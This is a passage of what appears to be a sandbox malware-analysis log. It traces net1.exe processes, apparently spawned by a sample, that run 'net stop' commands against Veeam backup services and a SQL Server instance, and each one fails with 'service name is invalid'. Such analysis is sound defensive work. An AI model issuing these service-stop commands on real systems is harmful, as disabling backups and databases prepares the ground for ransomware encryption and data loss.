_wcsicmp (_String1="server", _String2="VEEAMTRANSPORTSVC") returned -3 [0105.812] _wcsicmp (_String1="svr", _String2="VEEAMTRANSPORTSVC") returned -3 [0105.812] _wcsicmp (_String1="srv", _String2="VEEAMTRANSPORTSVC") returned -3 [0105.812] _wcsicmp (_String1="lanmanserver", _String2="VEEAMTRANSPORTSVC") returned -10 [0105.812] _wcsicmp (_String1="alerter", _String2="VEEAMTRANSPORTSVC") returned -21 [0105.812] _wcsicmp (_String1="netlogon", _String2="VEEAMTRANSPORTSVC") returned -8 [0105.812] NetServiceControl (in: servername=0x0, service="VEEAMTRANSPORTSVC", opcode=0x0, arg=0x0, bufptr=0xcf87c | out: bufptr=0xcf87c) returned 0x889 [0106.339] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0106.339] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71be0000 [0106.339] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x71be0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0106.340] GetFileType (hFile=0x0) returned 0x0 [0106.340] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x243e68 [0106.340] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x243e68, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0106.340] WriteFile (in: hFile=0x0, lpBuffer=0x243e68, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0xcf7bc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcf7bc, lpOverlapped=0x0) returned 0 [0106.340] LocalFree (hMem=0x243e68) returned 0x0 [0106.340] GetFileType (hFile=0x0) returned 0x0 [0106.340] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x246110 [0106.340] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x246110, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n$", lpUsedDefaultChar=0x0) returned 2 [0106.340] WriteFile (in: hFile=0x0, lpBuffer=0x246110, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xcf7bc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcf7bc, lpOverlapped=0x0) returned 0 [0106.340] LocalFree (hMem=0x246110) returned 0x0 [0106.340] _ultow (in: _Dest=0x889, _Radix=849900 | out: _Dest=0x889) returned="2185" [0106.340] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0106.341] GetFileType (hFile=0x0) returned 0x0 [0106.341] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x246110 [0106.341] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x246110, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0106.341] WriteFile (in: hFile=0x0, lpBuffer=0x246110, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0xcf7c8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcf7c8, lpOverlapped=0x0) returned 0 [0106.341] LocalFree (hMem=0x246110) returned 0x0 [0106.341] GetFileType (hFile=0x0) returned 0x0 [0106.341] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x246110 [0106.341] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x246110, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n$", lpUsedDefaultChar=0x0) returned 2 [0106.341] WriteFile (in: hFile=0x0, lpBuffer=0x246110, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xcf7c8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcf7c8, lpOverlapped=0x0) returned 0 [0106.341] LocalFree (hMem=0x246110) returned 0x0 [0106.341] NetApiBufferFree (Buffer=0x241af8) returned 0x0 [0106.341] NetApiBufferFree (Buffer=0x241b10) returned 0x0 [0106.341] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamTransportSvc /y" [0106.341] exit (_Code=2) Process: id = "124" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x243d3000" os_pid = "0xc14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "67" os_parent_pid = "0xd64" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamDeploymentService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 495 os_tid = 0xcf8 [0105.914] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fb74 | out: lpSystemTimeAsFileTime=0x14fb74*(dwLowDateTime=0x1426da50, dwHighDateTime=0x1d6f0d1)) [0105.914] GetCurrentProcessId () returned 0xc14 [0105.914] GetCurrentThreadId () returned 0xcf8 [0105.914] GetTickCount () returned 0x114e5cd [0105.914] QueryPerformanceCounter (in: lpPerformanceCount=0x14fb6c | out: lpPerformanceCount=0x14fb6c*=22501485500) returned 1 [0105.914] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0105.914] __set_app_type (_Type=0x1) [0105.914] __p__fmode () returned 0x770331f4 [0105.914] __p__commode () returned 0x770331fc [0105.915] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0105.915] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0105.915] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0105.915] GetConsoleOutputCP () returned 0x1b5 [0105.915] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0105.915] SetThreadUILanguage (LangId=0x0) returned 0x409 [0105.918] sprintf_s (in: _DstBuf=0x14fb2c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0105.918] setlocale (category=0, locale=".437") returned="English_United States.437" [0105.920] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0105.920] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0105.920] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamDeploymentService /y" [0105.920] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f8f8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0105.920] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x80) returned 0x243af8 [0105.920] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0105.921] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x14fafc | out: Buffer=0x14fafc*=0x241b00) returned 0x0 [0105.921] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x14fafc | out: Buffer=0x14fafc*=0x241b18) returned 0x0 [0105.921] _fileno (_File=0x77032900) returned -2 [0105.921] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0105.921] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0105.921] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0105.921] _wcsicmp (_String1="config", _String2="stop") returned -16 [0105.921] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0105.921] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0105.921] _wcsicmp (_String1="file", _String2="stop") returned -13 [0105.921] _wcsicmp (_String1="files", _String2="stop") returned -13 [0105.921] _wcsicmp (_String1="group", _String2="stop") returned -12 [0105.921] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0105.921] _wcsicmp (_String1="help", _String2="stop") returned -11 [0105.921] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0105.921] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0105.921] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0105.921] _wcsicmp (_String1="session", _String2="stop") returned -15 [0105.921] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0105.921] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0105.921] _wcsicmp (_String1="share", _String2="stop") returned -12 [0105.921] _wcsicmp (_String1="start", _String2="stop") returned -14 [0105.921] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0105.921] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0105.921] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0105.921] _wcsicmp (_String1="accounts", _String2="VeeamDeploymentService") returned -21 [0105.922] _wcsicmp (_String1="computer", _String2="VeeamDeploymentService") returned -19 [0105.922] _wcsicmp (_String1="config", _String2="VeeamDeploymentService") returned -19 [0105.922] _wcsicmp (_String1="continue", _String2="VeeamDeploymentService") returned -19 [0105.922] _wcsicmp (_String1="cont", _String2="VeeamDeploymentService") returned -19 [0105.922] _wcsicmp (_String1="file", _String2="VeeamDeploymentService") returned -16 [0105.922] _wcsicmp (_String1="files", _String2="VeeamDeploymentService") returned -16 [0105.922] _wcsicmp (_String1="group", _String2="VeeamDeploymentService") returned -15 [0105.922] _wcsicmp (_String1="groups", _String2="VeeamDeploymentService") returned -15 [0105.922] _wcsicmp (_String1="help", _String2="VeeamDeploymentService") returned -14 [0105.922] _wcsicmp (_String1="helpmsg", _String2="VeeamDeploymentService") returned -14 [0105.922] _wcsicmp (_String1="localgroup", _String2="VeeamDeploymentService") returned -10 [0105.922] _wcsicmp (_String1="pause", _String2="VeeamDeploymentService") returned -6 [0105.922] _wcsicmp (_String1="session", _String2="VeeamDeploymentService") returned -3 [0105.922] _wcsicmp (_String1="sessions", _String2="VeeamDeploymentService") returned -3 [0105.922] _wcsicmp (_String1="sess", _String2="VeeamDeploymentService") returned -3 [0105.922] _wcsicmp (_String1="share", _String2="VeeamDeploymentService") returned -3 [0105.922] _wcsicmp (_String1="start", _String2="VeeamDeploymentService") returned -3 [0105.922] _wcsicmp (_String1="stats", _String2="VeeamDeploymentService") returned -3 [0105.922] _wcsicmp (_String1="statistics", _String2="VeeamDeploymentService") returned -3 [0105.922] _wcsicmp (_String1="stop", _String2="VeeamDeploymentService") returned -3 [0105.922] _wcsicmp (_String1="time", _String2="VeeamDeploymentService") returned -2 [0105.922] _wcsicmp (_String1="user", _String2="VeeamDeploymentService") returned -1 [0105.922] _wcsicmp (_String1="users", _String2="VeeamDeploymentService") returned -1 [0105.922] _wcsicmp (_String1="msg", _String2="VeeamDeploymentService") returned -9 [0105.922] _wcsicmp (_String1="messenger", _String2="VeeamDeploymentService") returned -9 [0105.922] _wcsicmp (_String1="receiver", _String2="VeeamDeploymentService") returned -4 [0105.922] _wcsicmp (_String1="rcv", _String2="VeeamDeploymentService") returned -4 [0105.922] _wcsicmp (_String1="netpopup", _String2="VeeamDeploymentService") returned -8 [0105.922] _wcsicmp (_String1="redirector", _String2="VeeamDeploymentService") returned -4 [0105.922] _wcsicmp (_String1="redir", _String2="VeeamDeploymentService") returned -4 [0105.922] _wcsicmp (_String1="rdr", _String2="VeeamDeploymentService") returned -4 [0105.922] _wcsicmp (_String1="workstation", _String2="VeeamDeploymentService") returned 1 [0105.922] _wcsicmp (_String1="work", _String2="VeeamDeploymentService") returned 1 [0105.923] _wcsicmp (_String1="wksta", _String2="VeeamDeploymentService") returned 1 [0105.923] _wcsicmp (_String1="prdr", _String2="VeeamDeploymentService") returned -6 [0105.923] _wcsicmp (_String1="devrdr", _String2="VeeamDeploymentService") returned -18 [0105.923] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamDeploymentService") returned -10 [0105.923] _wcsicmp (_String1="server", _String2="VeeamDeploymentService") returned -3 [0105.923] _wcsicmp (_String1="svr", _String2="VeeamDeploymentService") returned -3 [0105.923] _wcsicmp (_String1="srv", _String2="VeeamDeploymentService") returned -3 [0105.923] _wcsicmp (_String1="lanmanserver", _String2="VeeamDeploymentService") returned -10 [0105.923] _wcsicmp (_String1="alerter", _String2="VeeamDeploymentService") returned -21 [0105.923] _wcsicmp (_String1="netlogon", _String2="VeeamDeploymentService") returned -8 [0105.923] _wcsupr (in: _String="VeeamDeploymentService" | out: _String="VEEAMDEPLOYMENTSERVICE") returned="VEEAMDEPLOYMENTSERVICE" [0105.923] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2454d8 [0105.926] GetServiceKeyNameW (in: hSCManager=0x2454d8, lpDisplayName="VEEAMDEPLOYMENTSERVICE", lpServiceName=0x3faaf0, lpcchBuffer=0x14fa98 | out: lpServiceName="", lpcchBuffer=0x14fa98) returned 0 [0105.927] _wcsicmp (_String1="msg", _String2="VEEAMDEPLOYMENTSERVICE") returned -9 [0105.927] _wcsicmp (_String1="messenger", _String2="VEEAMDEPLOYMENTSERVICE") returned -9 [0105.927] _wcsicmp (_String1="receiver", _String2="VEEAMDEPLOYMENTSERVICE") returned -4 [0105.927] _wcsicmp (_String1="rcv", _String2="VEEAMDEPLOYMENTSERVICE") returned -4 [0105.927] _wcsicmp (_String1="redirector", _String2="VEEAMDEPLOYMENTSERVICE") returned -4 [0105.927] _wcsicmp (_String1="redir", _String2="VEEAMDEPLOYMENTSERVICE") returned -4 [0105.927] _wcsicmp (_String1="rdr", _String2="VEEAMDEPLOYMENTSERVICE") returned -4 [0105.927] _wcsicmp (_String1="workstation", _String2="VEEAMDEPLOYMENTSERVICE") returned 1 [0105.927] _wcsicmp (_String1="work", _String2="VEEAMDEPLOYMENTSERVICE") returned 1 [0105.927] _wcsicmp (_String1="wksta", _String2="VEEAMDEPLOYMENTSERVICE") returned 1 [0105.927] _wcsicmp (_String1="prdr", _String2="VEEAMDEPLOYMENTSERVICE") returned -6 [0105.927] _wcsicmp (_String1="devrdr", _String2="VEEAMDEPLOYMENTSERVICE") returned -18 [0105.927] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMDEPLOYMENTSERVICE") returned -10 [0105.927] _wcsicmp (_String1="server", _String2="VEEAMDEPLOYMENTSERVICE") returned -3 [0105.927] _wcsicmp (_String1="svr", _String2="VEEAMDEPLOYMENTSERVICE") returned -3 [0105.927] _wcsicmp (_String1="srv", _String2="VEEAMDEPLOYMENTSERVICE") returned -3 [0105.927] _wcsicmp (_String1="lanmanserver", _String2="VEEAMDEPLOYMENTSERVICE") returned -10 [0105.927] _wcsicmp (_String1="alerter", _String2="VEEAMDEPLOYMENTSERVICE") returned -21 [0105.927] _wcsicmp (_String1="netlogon", _String2="VEEAMDEPLOYMENTSERVICE") returned -8 [0105.927] NetServiceControl (in: servername=0x0, service="VEEAMDEPLOYMENTSERVICE", opcode=0x0, arg=0x0, bufptr=0x14fa94 | out: bufptr=0x14fa94) returned 0x889 [0105.928] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0105.928] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71be0000 [0105.929] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x71be0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0105.930] GetFileType (hFile=0x0) returned 0x0 [0105.930] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x243ef8 [0105.930] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x243ef8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n#", lpUsedDefaultChar=0x0) returned 30 [0105.930] WriteFile (in: hFile=0x0, lpBuffer=0x243ef8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x14f9d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14f9d4, lpOverlapped=0x0) returned 0 [0105.930] LocalFree (hMem=0x243ef8) returned 0x0 [0105.930] GetFileType (hFile=0x0) returned 0x0 [0105.930] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2461a0 [0105.930] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2461a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n$", lpUsedDefaultChar=0x0) returned 2 [0105.930] WriteFile (in: hFile=0x0, lpBuffer=0x2461a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x14f9d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14f9d4, lpOverlapped=0x0) returned 0 [0105.930] LocalFree (hMem=0x2461a0) returned 0x0 [0105.930] _ultow (in: _Dest=0x889, _Radix=1374724 | out: _Dest=0x889) returned="2185" [0105.930] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0105.931] GetFileType (hFile=0x0) returned 0x0 [0105.931] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x2461a0 [0105.931] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x2461a0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0105.931] WriteFile (in: hFile=0x0, lpBuffer=0x2461a0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x14f9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14f9e0, lpOverlapped=0x0) returned 0 [0105.931] LocalFree (hMem=0x2461a0) returned 0x0 [0105.931] GetFileType (hFile=0x0) returned 0x0 [0105.931] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2461a0 [0105.931] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2461a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n$", lpUsedDefaultChar=0x0) returned 2 [0105.931] WriteFile (in: hFile=0x0, lpBuffer=0x2461a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x14f9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14f9e0, lpOverlapped=0x0) returned 0 [0105.931] LocalFree (hMem=0x2461a0) returned 0x0 [0105.931] NetApiBufferFree (Buffer=0x241b00) returned 0x0 [0105.931] NetApiBufferFree (Buffer=0x241b18) returned 0x0 [0105.931] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamDeploymentService /y" [0105.932] exit (_Code=2) Process: id = "125" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x24d9f000" os_pid = "0xce0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "62" os_parent_pid = "0xce4" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$SQLEXPRESS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 496 os_tid = 0xc10 [0106.018] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x29fe8c | out: lpSystemTimeAsFileTime=0x29fe8c*(dwLowDateTime=0x143783f0, dwHighDateTime=0x1d6f0d1)) [0106.018] GetCurrentProcessId () returned 0xce0 [0106.018] GetCurrentThreadId () returned 0xc10 [0106.018] GetTickCount () returned 0x114e63a [0106.018] QueryPerformanceCounter (in: lpPerformanceCount=0x29fe84 | out: lpPerformanceCount=0x29fe84*=22511922303) returned 1 [0106.019] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0106.019] __set_app_type (_Type=0x1) [0106.019] __p__fmode () returned 0x770331f4 [0106.019] __p__commode () returned 0x770331fc [0106.019] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0106.019] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0106.019] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0106.019] GetConsoleOutputCP () returned 0x1b5 [0106.019] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0106.019] SetThreadUILanguage (LangId=0x0) returned 0x409 [0106.022] sprintf_s (in: _DstBuf=0x29fe44, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0106.022] setlocale (category=0, locale=".437") returned="English_United States.437" [0106.024] GetStdHandle (nStdHandle=0xfffffff5) returned 0x40c [0106.024] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0106.024] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SQLEXPRESS /y" [0106.024] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x29fc10, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0106.024] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x74) returned 0x4df658 [0106.024] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0106.025] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x29fe14 | out: Buffer=0x29fe14*=0x4e1af8) returned 0x0 [0106.025] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x29fe14 | out: Buffer=0x29fe14*=0x4e1b10) returned 0x0 [0106.025] _fileno (_File=0x77032900) returned -2 [0106.025] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0106.025] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0106.025] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0106.025] _wcsicmp (_String1="config", _String2="stop") returned -16 [0106.025] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0106.025] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0106.025] _wcsicmp (_String1="file", _String2="stop") returned -13 [0106.025] _wcsicmp (_String1="files", _String2="stop") returned -13 [0106.025] _wcsicmp (_String1="group", _String2="stop") returned -12 [0106.025] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0106.025] _wcsicmp (_String1="help", _String2="stop") returned -11 [0106.025] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0106.025] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0106.026] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0106.026] _wcsicmp (_String1="session", _String2="stop") returned -15 [0106.026] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0106.026] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0106.026] _wcsicmp (_String1="share", _String2="stop") returned -12 [0106.026] _wcsicmp (_String1="start", _String2="stop") returned -14 [0106.026] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0106.026] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0106.026] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0106.026] _wcsicmp (_String1="accounts", _String2="MSSQL$SQLEXPRESS") returned -12 [0106.026] _wcsicmp (_String1="computer", _String2="MSSQL$SQLEXPRESS") returned -10 [0106.026] _wcsicmp (_String1="config", _String2="MSSQL$SQLEXPRESS") returned -10 [0106.026] _wcsicmp (_String1="continue", _String2="MSSQL$SQLEXPRESS") returned -10 [0106.026] _wcsicmp (_String1="cont", _String2="MSSQL$SQLEXPRESS") returned -10 [0106.026] _wcsicmp (_String1="file", _String2="MSSQL$SQLEXPRESS") returned -7 [0106.026] _wcsicmp (_String1="files", _String2="MSSQL$SQLEXPRESS") returned -7 [0106.026] _wcsicmp (_String1="group", _String2="MSSQL$SQLEXPRESS") returned -6 [0106.026] _wcsicmp (_String1="groups", _String2="MSSQL$SQLEXPRESS") returned -6 [0106.027] _wcsicmp (_String1="help", _String2="MSSQL$SQLEXPRESS") returned -5 [0106.027] _wcsicmp (_String1="helpmsg", _String2="MSSQL$SQLEXPRESS") returned -5 [0106.027] _wcsicmp (_String1="localgroup", _String2="MSSQL$SQLEXPRESS") returned -1 [0106.027] _wcsicmp (_String1="pause", _String2="MSSQL$SQLEXPRESS") returned 3 [0106.027] _wcsicmp (_String1="session", _String2="MSSQL$SQLEXPRESS") returned 6 [0106.027] _wcsicmp (_String1="sessions", _String2="MSSQL$SQLEXPRESS") returned 6 [0106.027] _wcsicmp (_String1="sess", _String2="MSSQL$SQLEXPRESS") returned 6 [0106.027] _wcsicmp (_String1="share", _String2="MSSQL$SQLEXPRESS") returned 6 [0106.027] _wcsicmp (_String1="start", _String2="MSSQL$SQLEXPRESS") returned 6 [0106.027] _wcsicmp (_String1="stats", _String2="MSSQL$SQLEXPRESS") returned 6 [0106.027] _wcsicmp (_String1="statistics", _String2="MSSQL$SQLEXPRESS") returned 6 [0106.027] _wcsicmp (_String1="stop", _String2="MSSQL$SQLEXPRESS") returned 6 [0106.027] _wcsicmp (_String1="time", _String2="MSSQL$SQLEXPRESS") returned 7 [0106.027] _wcsicmp (_String1="user", _String2="MSSQL$SQLEXPRESS") returned 8 [0106.027] _wcsicmp (_String1="users", _String2="MSSQL$SQLEXPRESS") returned 8 [0106.027] _wcsicmp (_String1="msg", _String2="MSSQL$SQLEXPRESS") returned -12 [0106.027] _wcsicmp (_String1="messenger", _String2="MSSQL$SQLEXPRESS") returned -14 [0106.027] _wcsicmp (_String1="receiver", _String2="MSSQL$SQLEXPRESS") returned 5 [0106.027] _wcsicmp (_String1="rcv", _String2="MSSQL$SQLEXPRESS") returned 5 [0106.027] _wcsicmp (_String1="netpopup", _String2="MSSQL$SQLEXPRESS") returned 1 [0106.027] _wcsicmp (_String1="redirector", _String2="MSSQL$SQLEXPRESS") returned 5 [0106.027] _wcsicmp (_String1="redir", _String2="MSSQL$SQLEXPRESS") returned 5 [0106.027] _wcsicmp (_String1="rdr", _String2="MSSQL$SQLEXPRESS") returned 5 [0106.028] _wcsicmp (_String1="workstation", _String2="MSSQL$SQLEXPRESS") returned 10 [0106.028] _wcsicmp (_String1="work", _String2="MSSQL$SQLEXPRESS") returned 10 [0106.028] _wcsicmp (_String1="wksta", _String2="MSSQL$SQLEXPRESS") returned 10 [0106.028] _wcsicmp (_String1="prdr", _String2="MSSQL$SQLEXPRESS") returned 3 [0106.028] _wcsicmp (_String1="devrdr", _String2="MSSQL$SQLEXPRESS") returned -9 [0106.028] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SQLEXPRESS") returned -1 [0106.028] _wcsicmp (_String1="server", _String2="MSSQL$SQLEXPRESS") returned 6 [0106.028] _wcsicmp (_String1="svr", _String2="MSSQL$SQLEXPRESS") returned 6 [0106.028] _wcsicmp (_String1="srv", _String2="MSSQL$SQLEXPRESS") returned 6 [0106.028] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SQLEXPRESS") returned -1 [0106.028] _wcsicmp (_String1="alerter", _String2="MSSQL$SQLEXPRESS") returned -12 [0106.028] _wcsicmp (_String1="netlogon", _String2="MSSQL$SQLEXPRESS") returned 1 [0106.028] 